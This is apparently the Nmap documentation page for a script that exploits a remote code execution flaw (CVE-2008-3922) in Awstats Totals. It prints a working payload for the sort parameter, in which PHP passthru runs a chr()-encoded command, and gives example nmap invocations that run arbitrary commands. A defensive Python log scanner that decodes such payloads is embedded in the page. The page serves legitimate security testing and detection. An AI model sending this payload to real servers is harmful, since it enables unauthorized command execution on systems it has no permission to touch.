Script http-awstatstotals-exec

Script types: portrule
Categories: vuln, intrusive, exploit
Download: https://svn.nmap.org/nmap/scripts/http-awstatstotals-exec.nse

Script Summary

Exploits a remote code execution vulnerability in Awstats Totals versions 1.0 through 1.14, and possibly other products based on it (CVE-2008-3922).

This vulnerability can be exploited through the sort GET parameter. The script queries the web server with the command payload encoded as a chain of PHP chr() calls:

?sort={%24{passthru%28chr(117).chr(110).chr(97).chr(109).chr(101).chr(32).chr(45).chr(97)%29}}{%24{exit%28%29}}

Common paths for Awstats Totals:

  • /awstats/index.php
  • /awstatstotals/index.php
  • /awstats/awstatstotals.php
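A defender-side counterpart to the payload above, added here as an example and not part of the Nmap script: it scans web-server access logs for the {${...}} injection in any query parameter, decodes the chr() chain back into the command that was attempted, and checks the request path against the common Awstats Totals locations listed above. The log lines are constructed samples, and the regexes and function names are this example's own assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed Apache-style access log lines (not real traffic): one probe carrying
# the page's payload, one benign request, and one probe against another common path.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Oct/2023:13:55:36 +0000] "GET /awstats/index.php?sort={%24{passthru%28chr(117).chr(110).chr(97).chr(109).chr(101).chr(32).chr(45).chr(97)%29}}{%24{exit%28%29}} HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Oct/2023:13:55:37 +0000] "GET /awstats/index.php?sort=visits HTTP/1.1" 200 8100 "-" "Mozilla/5.0"
198.51.100.4 - - [10/Oct/2023:14:02:01 +0000] "GET /awstatstotals/index.php?sort={%24{passthru%28chr(119).chr(104).chr(111).chr(97).chr(109).chr(105)%29}} HTTP/1.1" 200 40 "-" "curl/7.88"
"""

# Paths the script documentation lists as common Awstats Totals locations.
AWSTATS_PATHS = {"/awstats/index.php", "/awstatstotals/index.php", "/awstats/awstatstotals.php"}

LOG_RE = re.compile(r'^(?P<client>\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST|HEAD) (?P<target>\S+) HTTP/[\d.]+"')
# PHP's {${ ... }} "complex syntax", which the sort payload abuses to reach passthru().
INJECT_RE = re.compile(r'\{\s*\$\s*\{')
CHR_RE = re.compile(r'chr\(\s*(\d{1,3})\s*\)')

def decode_chr_chain(value: str) -> str:
    """Rebuild the string that a chain of chr(N).chr(M)... calls evaluates to."""
    return "".join(chr(int(n)) for n in CHR_RE.findall(value))

def inspect_request(line: str):
    """Return a finding dict for a request that injects into a query parameter, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    # parse_qs percent-decodes, so %24 and %28 become $ and ( before we match.
    for name, values in parse_qs(parts.query, keep_blank_values=True).items():
        for value in values:
            if INJECT_RE.search(value):
                return {
                    "client": m.group("client"),
                    "path": parts.path,
                    "known_awstats_path": parts.path in AWSTATS_PATHS,
                    "parameter": name,
                    "command": decode_chr_chain(value),
                }
    return None

def scan_log(text: str) -> list:
    """Run inspect_request over every line and collect the findings."""
    return [f for f in map(inspect_request, text.splitlines()) if f]

if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding)
```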

References:

Script Arguments

http-awstatstotals-exec.uri

Awstats Totals URI including path. Default: /index.php

http-awstatstotals-exec.cmd

Command to execute. Default: whoami

http-awstatstotals-exec.outfile

Output file. If set it saves the output in this file.

Other useful args when running this script: http.useragent - User-Agent to use in the GET request

slaxml.debug

See the documentation for the slaxml library.

http.host, http.max-body-size, http.max-cache-size, http.max-pipeline, http.pipeline, http.truncated-ok, http.useragent

See the documentation for the http library.

smbdomain, smbhash, smbnoguest, smbpassword, smbtype, smbusername

See the documentation for the smbauth library.

Example Usage

nmap -sV --script http-awstatstotals-exec.nse --script-args 'http-awstatstotals-exec.cmd="uname -a", http-awstatstotals-exec.uri=/awstats/index.php' <target>
nmap -sV --script http-awstatstotals-exec.nse <target>

Script Output

PORT   STATE SERVICE REASON
80/tcp open  http    syn-ack
| http-awstatstotals-exec.nse:
|_Output for 'uname -a':Linux 2.4.19 #1 Son Apr 14 09:53:28 CEST 2002 i686 GNU/Linux

Requires
Author:

  • Paulino Calderon <calderon@websec.mx>

License: Same as Nmap--See https://nmap.org/book/man-legal.html

action

action (host, port)

MAIN

Parameters

host

port